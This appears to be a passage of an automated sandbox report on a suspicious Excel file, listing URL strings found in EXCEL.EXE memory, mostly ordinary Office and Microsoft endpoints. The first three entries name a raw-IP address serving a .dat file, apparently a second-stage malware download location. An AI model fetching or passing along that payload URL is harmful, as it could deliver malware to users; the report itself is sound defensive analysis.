Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: http://45.142.211.62/939602286691.dat%9
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: http://45.142.211.62/939602286691.dat2
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: http://45.142.211.62/939602286691.dat2-8
Source: EXCEL.EXE, 00000000.00000003.662083291.00000000131C2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: EXCEL.EXE, 00000000.00000002.962261125.000000000DDDF000.00000004.00000001.sdmp String found in binary or memory: http://purl.oclc.org/ooxml/drawingml/diagram
Source: EXCEL.EXE, 00000000.00000002.962236753.000000000DDBF000.00000004.00000001.sdmp String found in binary or memory: http://purl.oclc.org/ooxml/drawingml/tablea
Source: EXCEL.EXE, 00000000.00000003.811957461.0000000015B00000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812216756.0000000015D0F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.811919748.0000000015D45000.00000004.00000001.sdmp String found in binary or memory: http://schemas.open
Source: EXCEL.EXE, 00000000.00000003.811957461.0000000015B00000.00000004.00000001.sdmp String found in binary or memory: http://schemas.openformatrg/package/2006/content-t
Source: EXCEL.EXE, 00000000.00000003.812216756.0000000015D0F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.811919748.0000000015D45000.00000004.00000001.sdmp String found in binary or memory: http://schemas.openformatrg/package/2006/r
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://addinsinstallation.store.office.com/app/downloadw&
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: EXCEL.EXE, 00000000.00000002.963180768.000000000FA50000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticatedQ
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticatedB
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957568679.0000000013401000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/removeBearer
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/removeh
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/queryv
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech&
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://api.aadrm.com
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://api.aadrm.com/
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://api.aadrm.com/HU9
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://api.addins.omex.office.net/appinfo/query~
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://api.addins.store.office.com/addinstemplate(
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://api.addins.store.office.com/app/query
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://api.addins.store.office.com/app/querym
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://api.cortana.ai
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://api.diagnostics.office.comom
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://api.microsoftstream.com/api/nt2
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://api.office.net
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://api.office.net%W
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://api.office.net9V
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://api.office.net_V(
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://api.onedrive.com
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://api.onedrive.comcent
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://api.powerbi.com/beta/myorg/importsp
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasetsj
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://apis.live.net/v5.0/ne
